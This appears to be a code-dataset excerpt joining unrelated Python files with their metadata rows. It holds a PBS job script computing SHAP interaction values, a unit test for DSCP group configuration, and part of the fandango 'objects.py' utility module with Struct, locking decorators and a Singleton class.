564,
579,
580,
595,
596,
601,
602,
603,
604,
606,
608,
620,
621,
646,
647,
648,
649,
651,
652,
653,
654,
655,
664,
665,
666,
667,
680,
681,
698,
699,
704,
705,
706,
707,
708,
709,
717,
718,
735,
736,
737,
738,
739,
740,
741,
742,
743,
751,
752,
753,
754,
768,
769,
801,
802,
808,
809,
810,
811,
814,
815,
823,
824,
856,
857,
858,
859,
860,
861,
862,
863,
864,
868,
869,
870,
871,
892,
893,
936,
937,
946,
947,
948,
949,
950,
951,
966,
967,
977,
978,
1001,
1002,
1003,
1004,
1005,
1006,
1008,
1009,
1010,
1013,
1014,
1015,
1016,
1049,
1050,
1054,
1055,
1056,
1057,
1058,
1059,
1064,
1065,
1073,
1074,
1086,
1087,
1088,
1089,
1090,
1091,
1094,
1095,
1096,
1100,
1101,
1102,
1104,
1126,
1128,
1129,
1130,
1131,
1132,
1133,
1139,
1140,
1147,
1148,
1163,
1164,
1165,
1166,
1167,
1168,
1170,
1171,
1172,
1173,
1174,
1201,
1202,
1203,
1204,
1205,
1206,
1207,
1217,
1218,
1230,
1231,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1267,
1268,
1275,
1276,
1277,
1281,
1282,
1283,
1284,
1286,
1287,
1294,
1295,
1306,
1307,
1308,
1309,
1310,
1311,
1312,
1313,
1314,
1324,
1325,
1332,
1333,
1334,
1335,
1336,
1337,
1338,
1339,
1340,
1345,
1346,
1360,
1361,
1362,
1363,
1366,
1367,
1368,
1369,
1370,
1380,
1381,
1393,
1394,
1395,
1398,
1403,
1404,
1405,
1406,
1407,
1408,
1411,
1412,
1426,
1427,
1428,
1429,
1430,
1438,
1439,
1449,
1450,
1451,
1452,
1454,
1455,
1456,
1457,
1458,
1459,
1462,
1463,
1471,
1472,
1473,
1474,
1475,
1485,
1486,
1494,
1496,
1497,
1498,
1503,
1504,
1505,
1506,
1507,
1508,
1514,
1515,
1521,
1522,
1529,
1530,
1531,
1536,
1537,
1538,
1540,
1541,
1562,
1564,
1565,
1566,
1572,
1574,
1575,
1576,
1577,
1578,
1579,
1584,
1585,
1591,
1592,
1604,
1605,
1606,
1616,
1617,
1618,
1619,
1620,
1643,
1644,
1645,
1646,
1658,
1659,
1660,
1661,
1662,
1663,
1664,
1672,
1673,
1677,
1678,
1689,
1690,
1691,
1706,
1707,
1708,
1709,
1710,
1737,
1740,
1741,
1742,
1750,
1751,
1752,
1753,
1754,
1755,
1756,
1764,
1765,
1769,
1770,
1776,
1781,
1782,
1791,
1792,
1793,
1794,
1795,
1826,
1827,
1828,
1829,
1836,
1837,
1838,
1839,
1840,
1843,
1844,
1851,
1852,
1855,
1856,
1862,
1863,
1864,
1876,
1877,
1878,
1879,
1880,
1901,
1903,
1904,
1905,
1914,
1915,
1916,
1917,
1918,
1919,
1920,
1927,
1928,
1939,
1940,
1957,
1958,
1959,
1962,
1964,
1965,
1966,
1971,
1972,
1973,
1974,
1975,
1976,
1977,
1981,
1982,
2004,
2005,
2027,
2028,
2051,
2053,
2054,
2056,
2059,
2060,
2061,
2073,
2074,
2075,
2076,
2077,
2078,
2079,
2095,
2096,
2102,
2103,
2131,
2132,
2133,
2134,
2185,
2187,
2188,
2189,
2192,
2193,
2194,
2201,
2202,
2203,
2204,
2205,
2206,
2207,
2222,
2225,
2226,
2235,
2236,
2255,
2256,
2257,
2258,
2313,
2316,
2317,
2320,
2323,
2324,
2326,
2336,
2337,
2338,
2339,
2340,
2341,
2342,
2345,
2350,
2351,
2364,
2365,
2387,
2388,
2389,
2390,
2433,
2435,
2436,
2437,
2439,
2440,
2443,
2449,
2450,
2451,
2452,
2453,
2454,
2455,
2461,
2465,
2466,
2470,
2471,
2487,
2488,
2489,
2490,
2533,
2536,
2537,
2538,
2540,
2541,
2542,
2546,
2547,
2548,
2549,
2550,
2551,
2552,
2563,
2566,
2567,
2572,
2573,
2588,
2589,
2590,
2591,
2640,
2641,
2642,
2643,
2644,
2646,
2647,
2648,
2657,
2658,
2659,
2660,
2661,
2662,
2663,
2671,
2674,
2675,
2681,
2682,
2704,
2705,
2706,
2707,
2750,
2752,
2753,
2754,
2755,
2756,
2757,
2758,
2762,
2763,
2764,
2765,
2766,
2767,
2768,
2773,
2778,
2779,
2791,
2792,
2817,
2818,
2819,
2820,
2842,
2845,
2846,
2847,
2848,
2849,
2850,
2851,
2854,
2855,
2856,
2858,
2859,
2860,
2863,
2869,
2870,
2882,
2883,
2895,
2896,
2897,
2898,
2899,
2903,
2920,
2924,
2925,
2926,
2927,
2928,
2929,
2930,
2933,
2934,
2935,
2936,
2937,
2940,
2944,
2945,
2948,
2949,
2959,
2960,
2973,
2974,
2975,
2976,
2977,
2980,
3013,
3016,
3017,
3018,
3019,
3020,
3021,
3022,
3024,
3027,
3028,
3029,
3032,
3034,
3038,
3046,
3047,
3052,
3053,
3057,
3058,
3074,
3075,
3076,
3077,
3078,
3089,
3123,
3125,
3126,
3127,
3128,
3129,
3130,
3131,
3132,
3138,
3139,
3140,
3141,
3142,
3144,
3145,
3146,
3150,
3151,
3159,
3160,
3179,
3180,
3181,
3182,
3183,
3190,
3230,
3232,
3233,
3234,
3235,
3236,
3237,
3238,
3239,
3240,
3245,
3246,
3247,
3248,
3249,
3250,
3254,
3255,
3258,
3259,
3266,
3267,
3300,
3301,
3302,
3303,
3304,
3305,
3309,
3331,
3332,
3333,
3334,
3335,
3337,
3338,
3340,
3341,
3343,
3345,
3346,
3347,
3348,
3349,
3350,
3357,
3358,
3361,
3362,
3370,
3371,
3400,
3401,
3402,
3403,
3404,
3405,
3415,
3456,
3458,
3459,
3460,
3461,
3463,
3464,
3466,
3467,
3468,
3472,
3473,
3474,
3475,
3476,
3477,
3479,
3480,
3482,
3483,
3488,
3489,
3506,
3508,
3509,
3510,
3511,
3512,
3513,
3524,
3556,
3557,
3558,
3559,
3560,
3563,
3564,
3565,
3566,
3567,
3571,
3572,
3573,
3575,
3576,
3578,
3588,
3589,
3592,
3593,
3599,
3600,
3622,
3624,
3625,
3626,
3627,
3628,
3629,
3646,
3676,
3677,
3678,
3679,
3680,
3681,
3682,
3683,
3685,
3686,
3687,
3692,
3693,
3694,
3695,
3696,
3698,
3701,
3708,
3709,
3714,
3715,
3718,
3719,
3740,
3741,
3743,
3745,
3746,
3747,
3748,
3749,
3759,
3791,
3792,
3793,
3794,
3795,
3796,
3798,
3799,
3800,
3801,
3802,
3811,
3812,
3813,
3814,
3815,
3816,
3818,
3826,
3827,
3829,
3830,
3839,
3840,
3856,
3857,
3858,
3859,
3860,
3861,
3872,
3904,
3905,
3907,
3908,
3909,
3910,
3911,
3912,
3913,
3914,
3915,
3916,
3922,
3923,
3924,
3925,
3926,
3927,
3929,
3933,
3934,
3935,
3940,
3941,
3946,
3947,
3969,
3970,
3971,
3972,
3973,
3974,
3975,
3985,
4017,
4020,
4021,
4022,
4023,
4024,
4025,
4026,
4027,
4028,
4029,
4034,
4035,
4036,
4037,
4038,
4039,
4042,
4050,
4051,
4052,
4053,
4054,
4058,
4059,
4069,
4071,
4072,
4073,
4074,
4075,
4076,
4082,
4100,
4102,
4103,
4104,
4105,
4106,
4108,
4109,
4112,
4113,
4114,
4115,
4116,
4117,
4118,
4119,
4120,
4121,
4122,
4127,
4128,
4129,
4130,
4131,
4144,
4145,
4158,
4160,
4161,
4162,
4163,
4164,
4165,
4166,
4172,
4175,
4177,
4178,
4201,
4202,
4203,
4204,
4205,
4206,
4207,
4208,
4210,
4211,
4212,
4213,
4214,
4223,
4224,
4225,
4226,
4227,
4228,
4229,
4234,
4235,
4236,
4237,
4238,
4248,
4261,
4263,
4264,
4265,
4266,
4267,
4268,
4269,
4270,
4285,
4288,
4292,
4298,
4299,
4318,
4322,
4323,
4324,
4325,
4326,
4329,
4330,
4333,
4334,
4336,
4338,
4339,
4340,
4341,
4342,
4345,
4350,
4351,
4352,
4353,
4354,
4366,
4367,
4380,
4382,
4387,
4388,
4389,
4390,
4391,
4392,
4393,
4399,
4403,
4411,
4415,
4416,
4426,
4427,
4444,
4445,
4446,
4447,
4448,
4449,
4450,
4451,
4452,
4453,
4457,
4458,
4459,
4460,
4462,
4464,
4466,
4467,
4475,
4476,
4477,
4478,
4479,
4498,
4499,
4507,
4509,
4510,
4511,
4512,
4513,
4514,
4515,
4524,
4525,
4526,
4533,
4539,
4540,
4549,
4550,
4563,
4566,
4568,
4569,
4570,
4571,
4573,
4574,
4575,
4576,
4578,
4582,
4583,
4584,
4585,
4586,
4587,
4588,
4596,
4597,
4598,
4599,
4600,
4601,
4609,
4610,
4624,
4626,
4627,
4628,
4629,
4630,
4631,
4632,
4638,
4646,
4652,
4653,
4659,
4660,
4669,
4672,
4673,
4674,
4675,
4677,
4678,
4681,
4682,
4683,
4687,
4688,
4689,
4690,
4691,
4692,
4693,
4702,
4703,
4704,
4705,
4706,
4707,
4708,
4723,
4724,
4737,
4739,
4740,
4741,
4742,
4743,
4744,
4745,
4746,
4759,
4768,
4772,
4773,
4779,
4795,
4801,
4802,
4803,
4804,
4806,
4807,
4809,
4810,
4812,
4820,
4821,
4822,
4823,
4825,
4826,
4828,
4829,
4838,
4839,
4840,
4841,
4842,
4843,
4844,
4845,
4858,
4859,
4890,
4891,
4892,
4894,
4895,
4896,
4897,
4898,
4899,
4900,
4911,
4912,
4913,
4915,
4921,
4924,
4925,
4935,
4936,
4957,
4959,
4960,
4961,
4962,
4964,
4965,
4966,
4967,
4969,
4970,
4973,
4977,
4978,
4979,
4980,
4981,
4982,
4990,
4991,
4992,
4993,
4994,
4996,
4997,
4998,
5025,
5028,
5031,
5032,
5033,
5034,
5035,
5036,
5037,
5045,
5046,
5047,
5049,
5054,
5055,
5059,
5060,
5071,
5072,
5105,
5107,
5108,
5109,
5110,
5116,
5118,
5119,
5120,
5122,
5123,
5124,
5126,
5127,
5128,
5137,
5138,
5139,
5140,
5141,
5142,
5143,
5144,
5174,
5176,
5178,
5179,
5180,
5181,
5182,
5183,
5184,
5188,
5189,
5195,
5200,
5201,
5202,
5205,
5206,
5207,
5208,
5213,
5214,
5232,
5233,
5234,
5235,
5236,
5237,
5238,
5239,
5240,
5241,
5242,
5245,
5248,
5249,
5250,
5253,
5254,
5256,
5260,
5261,
5262,
5263,
5264,
5266,
5267,
5268,
5289,
5290,
5292,
5293,
5294,
5295,
5296,
5297,
5298,
5299,
5300,
5306,
5308,
5309,
5310,
5319,
5320,
5327,
5328,
5339,
5340,
5352,
5353,
5354,
5355,
5356,
5357,
5358,
5359,
5361,
5366,
5367,
5368,
5369,
5370,
5371,
5376,
5380,
5381,
5382,
5383,
5384,
5385,
5386,
5387,
5418,
5419,
5421,
5422,
5423,
5424,
5425,
5426,
5427,
5430,
5431,
5438,
5439,
5440,
5441,
5448,
5449,
5454,
5455,
5460,
5461,
5482,
5483,
5484,
5485,
5486,
5488,
5489,
5490,
5491,
5499,
5500,
5501,
5502,
5503,
5504,
5511,
5515,
5516,
5517,
5518,
5519,
5520,
5521,
5522,
5538,
5556,
5557,
5559,
5560,
5561,
5562,
5563,
5564,
5565,
5570,
5571,
5577,
5579,
5580,
5582,
5587,
5588,
5592,
5593,
5601,
5627,
5628,
5629,
5630,
5631,
5633,
5634,
5635,
5636,
5639,
5640,
5641,
5643,
5644,
5645,
5652,
5653,
5654,
5655,
5656,
5657,
5658,
5659,
5660,
5672,
5696,
5697,
5698,
5700,
5701,
5702,
5703,
5704,
5705,
5706,
5710,
5711,
5715,
5716,
5717,
5719,
5723,
5724,
5727,
5728,
5738,
5764,
5765,
5766,
5767,
5769,
5770,
5771,
5772,
5782,
5783,
5784,
5786,
5787,
5788,
5794,
5798,
5799,
5800,
5801,
5802,
5803,
5804,
5805,
5815,
5816,
5837,
5838,
5839,
5840,
5842,
5843,
5844,
5845,
5846,
5847,
5848,
5850,
5851,
5855,
5857,
5858,
5860,
5871,
5872,
5874,
5875,
5899,
5900,
5901,
5902,
5905,
5906,
5907,
5908,
5913,
5914,
5915,
5916,
5917,
5918,
5920,
5926,
5927,
5928,
5929,
5930,
5931,
5932,
5933,
5940,
5941,
5963,
5964,
5965,
5966,
5967,
5968,
5969,
5970,
5972,
5973,
5974,
5975,
5976,
5978,
5979,
5982,
5983,
5990,
5994,
5995,
5997,
]
index = int(os.environ["PBS_ARRAY_INDEX"])
if indices is not None:
index = indices[index]
print("Index:", index)
X_train, X_test, y_train, y_test = data_split_cache.load()
rf = get_model()
job_samples = 50
tree_path_dependent_shap_interact_cache = SimpleCache(
f"tree_path_dependent_shap_interact_{index}_{job_samples}",
cache_dir=os.path.join(CACHE_DIR, "shap_interaction"),
)
@tree_path_dependent_shap_interact_cache
def cached_get_interact_shap_values(model, X):
return get_shap_values(model, X, interaction=True)
cached_get_interact_shap_values(
rf, X_train[index * job_samples : (index + 1) * job_samples]
)
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=1734,
)
| 14.16314
| 84
| 0.298306
| 0
| 0
| 0
| 0
| 150
| 0.005897
| 0
| 0
| 347
| 0.013642
|
0b3f95c97639b3abd555db4e30fef992d56dda30
| 1,954
|
py
|
Python
|
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | 2
|
2020-05-27T10:34:20.000Z
|
2021-01-20T05:40:32.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019, AT&T Intellectual Property.
# All rights reserved.
#
# SPDX-License-Identifier: LGPL-2.1-only
#
"""
Unit-tests for the qos_config.py module.
"""
from vyatta.res_grp.res_grp_config import ResGrpConfig
TEST_DATA = {
'vyatta-resources-v1:resources': {
'vyatta-resources-group-misc-v1:group': {
'vyatta-resources-dscp-group-v1:dscp-group': [
{
'group-name': 'group-a',
'dscp': [
'0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', '10', '11', '12', '13', '14', '15'
]
}, {
'group-name': 'group-b',
'dscp': [
'16', '17', '18', '19', '20', '21', '22', '23',
'24', '25', '26', '27', '28', '29', '30', '31'
]
}, {
'group-name': 'group-c',
'dscp': [
'32', '33', '34', '35', '36', '37', '38', '39',
'40', '41', '42', '43', '44', '45', '46', '47'
]
}, {
'group-name': 'group-d',
'dscp': [
'48', '49', '50', '51', '52', '53', '54', '55',
'56', '57', '58', '59', '60', '61', '62', '63'
]
}
]
}
}
}
def test_rgconfig():
""" Simple unit-test for the ResGrpConfig class """
config = ResGrpConfig(TEST_DATA)
assert config is not None
assert len(config.dscp_groups) == 4
assert config.get_dscp_group("group-a") is not None
assert config.get_dscp_group("group-b") is not None
assert config.get_dscp_group("group-c") is not None
assert config.get_dscp_group("group-d") is not None
assert config.get_dscp_group("group-e") is None
| 32.566667
| 71
| 0.413511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.381269
|
0b4263d7f857ffd13d9244963a213a2d55a3ea6f
| 36,145
|
py
|
Python
|
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
#!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def dirModule(module):
return [a for a,v in module.__dict__.items()
if getattr(v,'__module__','') == module.__name__]
def findModule(module):
from imp import find_module
if '.' not in module:
return find_module(module)[1]
else:
parent,child = module.rsplit('.', 1)
#mparent = loadModule(parent)
pparent = findModule(parent)
pchild = find_module(child, [pparent])[1]
return pchild
def loadModule(module,modulename=None):
#Loads a python module either from source file or from module
import imp
if modulename or '/' in module or '.py' in module:
if not modulename:
modulename = module.split('/')[-1].split('.py')[0]
modulename = replaceCl('[-\.]', '_', modulename)
return imp.load_source(modulename, module)
elif '.' not in module:
return imp.load_module(module, *imp.find_module(module))
else:
parent,child = module.rsplit('.', 1)
mparent = loadModule(parent)
args = imp.find_module(child, mparent.__path__)
mchild = imp.load_module(module, *args)
return mchild
def dirClasses(module,owned=False):
v = [a for a,v in module.__dict__.items() if isinstance(v,type)]
if owned: return [a for a in dirModule(module) if a in v]
else: return v
def copy(obj):
"""
This method will return a copy for a python primitive object.
It will not work for class objects unless they implement the
__init__(other) constructor
"""
if hasattr(obj,'copy'):
o = obj.copy()
else:
try:
o = type(obj)(other=obj)
except:
o = type(obj)(obj)
return o
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
"""
Converts a python object to a dictionary with all its members
as python primitives
This can be used in Queues or to convert to str using pickle.dumps
:param fltr: a callable(name):bool method
"""
dct = {}
try:
for name in dir(obj):
if fltr and not fltr(name):
continue
try:
attr = getattr(obj,name)
if hasattr(attr,'__call__'): continue
if name == 'inited_class_list': continue
if name.startswith('__'): continue
if type_check:
try:
if type(attr).__name__ not in dir(__builtin__):
if isinstance(attr,dict):
attr = dict((k,v) for k,v in attr.items())
else:
attr = str(attr)
except:
continue
dct[name] = attr
except Exception,e:
print(e)
if class_check:
klass = obj.__class__
if '__class__' not in dct:
dct['__class__'] = klass.__name__
if '__bases__' not in dct:
dct['__bases__'] = [b.__name__ for b in klass.__bases__]
if '__base__' not in dct:
dct['__base__'] = klass.__base__.__name__
except Exception,e:
print(e)
return(dct)
def pick(filename, keys = []):
import pickle
try:
f = open(filename)
v = pickle.load(f)
if keys:
try:
for k in keys:
v = v[k]
except:
traceback.print_exc()
return v
except:
traceback.print_exc()
finally:
f.close()
def dump(value, filename, as_dict = False):
import pickle
try:
f = open(filename, 'w')
if not as_dict:
try:
pickle.dump(value, f)
except:
as_dict = True
if as_dict:
pickle.dump(obj2dict(value), f)
except:
traceback.print_exc()
finally:
f.close()
## Useful class objects
class Struct(object):
"""
Metamorphic type to pass/retrieve data objects as object or dictionary
s = Struct(name='obj1',value=3.0)
s.setCastMethod(lambda k,v: str2type)
s.cast('3.0') : 3.0
s.keys() : ['name', 'value']
s.to_str() : "fandango.Struct({'name': obj1,'value': 3.0,})"
s.dict() : {'name': 'obj1', 'value': 3.0}
"""
def __init__(self,*args,**kwargs):
self.load(*args,**kwargs)
def load(self,*args,**kwargs):
dct = args[0] if len(args)==1 else (args or kwargs)
if isSequence(dct) and not isDictionary(dct):
dct = dict.fromkeys(dct) #isDictionary also matches items lists
[setattr(self,k,v) for k,v in (dct.items()
if hasattr(dct,'items') else dct)]
#Overriding dictionary methods
def update(self,*args,**kwargs): return self.load(*args,**kwargs)
def keys(self): return self.__dict__.keys()
def values(self): return self.__dict__.values()
def items(self): return self.__dict__.items()
def dict(self): return self.__dict__
def get(self,k,default=None):
try: #Some keys may raise exception
return getattr(self,k,default)
except:
return default
def get_key(self,value):
""" Reverse lookup """
for k,v in self.items():
if v == value:
return k
raise Exception('%s_NotFound!'%value)
def set(self,k,v): return setattr(self,k,v)
def setdefault(self,v): self.dict().setdefault(v)
def pop(self,k): return self.__dict__.pop(k)
def has_key(self,k): return self.__dict__.has_key(k)
def __getitem__(self,k): return getattr(self,k)
def __setitem__(self,k,v): return setattr(self,k,v)
def __contains__(self,k): return hasattr(self,k)
def __call__(self,*args,**kwargs):
"""getter with one string, setter if 2 are passed"""
assert len(args) in (1,2)
if len(args)==2: setattr(self,args[0],args[1])
elif len(args)==1 and isString(args[0]): return getattr(self,args[0])
else: self.load(*args,**kwargs)
def __repr__(self):
return 'fandango.Struct({\n'+'\n'.join("\t'%s': %s,"%(k,v)
for k,v in self.__dict__.items())+'\n\t})'
def __str__(self):
return self.__repr__().replace('\n','').replace('\t','')
def to_str(self,order=None,sep=','):
""" This method provides a formatable string for sorting"""
return self.__str__() if order is None else (
sep.join('%s'%self[k] for k in order))
def default_cast(self,key=None,value=None):
"""
This method checks if key is already defined.
If it is, it will return value as an evaluable string.
If it is not, then it will do same action on the passed value.
"""
if key not in self.keys() and not value:
key,value = None,key #defaults to single argument mode
value = notNone(value,key and self.get(key))
if not isString(value):
return value
else:
return str2type(value)
def cast(self,key=None,value=None,method=None):
"""
The cast() method is used to convert an struct to a pickable/json obj
Use set_cast_method(f) to override this call.
The cast method must accept both key and value keyword arguments.
"""
return (method or self.default_cast)(key,value)
def cast_items(self,items=[],update=True):
"""
The cast() method is used to convert an struct to a pickable/json obj
"""
items = items or self.items()
items = [(k,self.cast(value=v)) for k,v in self.items()]
if update:
[self.set(k,v) for k,v in items]
return items
def _fget(self,var):
return getattr(self,var)
def _fset(self,value,var):
setattr(self,var,value)
def _fdel(self,var):
delattr(self,var)
def make_property(var,fget=_fget,fset=_fset,fdel=_fdel):
""" This Class is in Beta, not fully implemented yet"""
return property(partial(fget,var=var),partial(fset,var=var),
partial(fdel,var=var),doc='%s property'%var)
class Variable(object):
"""
This class helps to declare module variables that can share the
state when updated from parent modules.
e.g. fandango.DEFAULT_TIME_FORMAT <=> functional.DEFAULT_TIME_FORMAT
"""
def __new__(cls, value):
print(cls,value)
__instance = object.__new__(cls, value)
cls.__init__(__instance, value)
return __instance.value
def __init__(self, value = None):
self._value = value
@property
def value(self):
return self._value
@value.setter
def set_value(self, value):
self._value = v
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
#return '_%s'self.name
def NamedProperty(name,fget=None,fset=None,fdel=None):#,doc=None):
"""
This Class is in Beta, not fully implemented yet
It makes easier to declare name independent property's (descriptors) by
using template methods like:
def fget(self,var): # var is the identifier of the variable
return getattr(self,var)
def fset(self,value,var): # var is the identifier of the variable
setattr(self,var,value)
def fdel(self,var): # var is the identifier of the variable
delattr(self,var)
MyObject.X = Property(fget,fset,fdel,'X')
"""
return property(partial(fget,var=name) if fget else None,
partial(fset,var=name) if fset else None,
partial(fdel,var=name) if fdel else None,doc=name)
import threading
__lock__ = threading.RLock()
def locked(f,*args,**kwargs):
"""
decorator for secure-locked functions
A key-argument _lock can be used to use a custom Lock object
"""
_lock = kwargs.pop('_lock',__lock__)
try:
_lock.acquire()
return f(*args,**kwargs)
except Exception,e:
print 'Exception in%s(*%s,**%s): %s' % (f.__name__,args,kwargs,e)
finally:
_lock.release()
def self_locked(func,reentrant=True):
''' Decorator to make thread-safe class members
@deprecated
@note see in tau.core.utils.containers
Decorator to create thread-safe objects.
reentrant: CRITICAL:
With Lock() this decorator should not be used to decorate nested
functions; it will cause Deadlock!
With RLock this problem is avoided ... but you should rely more
on python threading.
'''
@functools.wraps(func)
def lock_fun(self,*args,**kwargs):
#self,args = args[0],args[1:]
if not hasattr(self,'lock'):
setattr(self,'lock',threading.RLock() if reentrant
else threading.Lock())
if not hasattr(self,'trace'):
setattr(self,'trace',False)
self.lock.acquire()
try:
#if self.trace: print "locked: %s"%self.lock
result = func(self,*args,**kwargs)
finally:
self.lock.release()
#if self.trace: print "released: %s"%self.lock
return result
#lock_fun.__name__ = func.__name__
#lock_fun.__doc__ = func.__doc__
return lock_fun
###############################################################################
def NewClass(classname,classparent=None,classdict=None):
"""
Creates a new class on demand:
ReleaseNumber = NewClass('ReleaseNumber',tuple,
{'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))})
"""
if classparent and not isSequence(classparent):
classparent = (classparent,)
return type(classname,classparent or (object,),classdict or {})
class ReleaseNumber(object):
"""
ReleaseNumber = type('ReleaseNumber',(tuple,),{
'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))
})
"""
def __init__(self,*args):
assert args
if len(args)==1:
if isinstance(args[0],basestring):
args = args[0].split('.')
elif isSequenceType(args[0]):
args = args[0]
else:
args = [args]
self._tuple = tuple(args)
def __iter__(self): return self._tuple.__iter__()
def __len__(self): return self._tuple.__len__()
def __getitem__(self,i): return self._tuple.__getitem__(i)
def __hash__(self): return self._tuple.__hash__()
def __repr__(self):
return '.'.join(map(str,self))
def major(self):
try:
m = int(self[0])
return m
except:
return '0'
def minor(self):
try:
m = int(self[1])
return m
except:
return '0'
def patch(self):
try:
m = int(self[2])
return m
except:
return self[2] if len(self)>2 else '0'
def __cmp__(self,other):
if not isinstance(other,ReleaseNumber):
other = ReleaseNumber(other)
if self._tuple == other._tuple:
return 0
if int(self.major()) < other.major():
return -1
if int(self.major()) > other.major():
return 1
if int(self.minor()) < other.minor():
return -1
if int(self.minor()) > other.minor():
return 1
if self.patch() < other.patch():
return -1
if self.patch() > other.patch():
return 1
return 0
def __gt__(self,other): return self.__cmp__(other) > 0
def __ge__(self,other): return self.__cmp__(other) >= 0
def __lt__(self,other): return self.__cmp__(other) < 0
def __le__(self,other): return self.__cmp__(other) <= 0
def __eq__(self,other): return not self.__cmp__(other)
def __ne__(self,other): return self.__cmp__(other)
###############################################################################
class Object(object):
"""
This class solves some problems when an object inherits from multiple
classes and some of them inherit from the same 'grandparent' class
"""
def __init__(self):
""" default initializer
@todo be more clever!
"""
pass
#self.name = None
## @var name
# Var does nothing
# @todo be more clever!
pass
def call__init__(self, klass, *args, **kw):
if 'inited_class_list' not in self.__dict__:
self.inited_class_list = []
if klass not in self.inited_class_list:
self.inited_class_list.append(klass)
#print('#'*80)
#print('%s(%s).call__init__(%s,%s)' % (
#type(self).__name__,klass.__name__,args,kw))
#print('#'*80)
klass.__init__(self, *args, **kw)
def call_all__init__(self, klass, *_args, **_kw):
''' Call __init__ recursively, for multiple dynamic inheritance.
@author srubio@cells.es
This method should be called only if all arguments are keywords!!!
Multiple __init__ calls with unnamed arguments is hard to manage:
All the _args values will be assigned to non-keyword args
e.g:
from objects import Object
class A(Object):
def __init__(self,a=2):
print 'A.__init__',a
class B(A):
def __init__(self,b):
print 'B.__init__',b
class C(B,A):
def __init__(self,c):
print 'C.__init__',c
class D(C,B):
def __init__(self,d=1,*args,**kwargs):
self.call_all__init__(D,*args,**kwargs)
print 'D.__init__',d
D(a=1,b=2,c=3,d=4)
'''
#if _args:
# raise Exception,'__init_all_Object_withUnnamedArgumentsException'
from inspect import getargspec
#print '%s.call_all__init__(%s,%s)' % (klass.__name__,_args,_kw)
for base in klass.__bases__:
if 'call__init__' in dir(base) and \
('inited_class_list' not in self.__dict__
or base not in self.inited_class_list):
#print '\t%s.base is %s' % (klass.__name__,base.__name__)
nkw,i = {},0
try:
args,largs,kargs,vals = getargspec(base.__init__)
if kargs: nkw = dict(_kw)
for arg in args:
if arg == 'self': continue
if arg in _kw:
nkw[arg] = _kw[arg]
elif i<len(_args):
nkw[arg], i = _args[i], i+1
self.call_all__init__(base,*_args,**_kw)
self.call__init__(base,**nkw)
except Exception,e:
print('Unable to execute %s.__init__!: %s'
% (base.__name__,str(e)))
return
def getAttrDict(self):
return obj2dict(self)
def updateAttrDict(self, other):
attr = other.getAttrDict()
self.__dict__.update(attr)
###############################################################################
class Singleton(object):
"""
This class allows Singleton objects overriding __new__ and renaming
__init__ to init_single
The __new__ method is overriden to force Singleton behaviour,
the Singleton is created for the lowest subClass.
@warning although __new__ is overriden __init__ is still being called
for each instance=Singleton(), this is way we replace it by __dub_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instance = None
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
if cls != type(cls.__instance):
__instance = object.__new__(cls)
#srubio: added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
#Done at the end to prevent failed __init__ to create singletons
cls.__instance = __instance
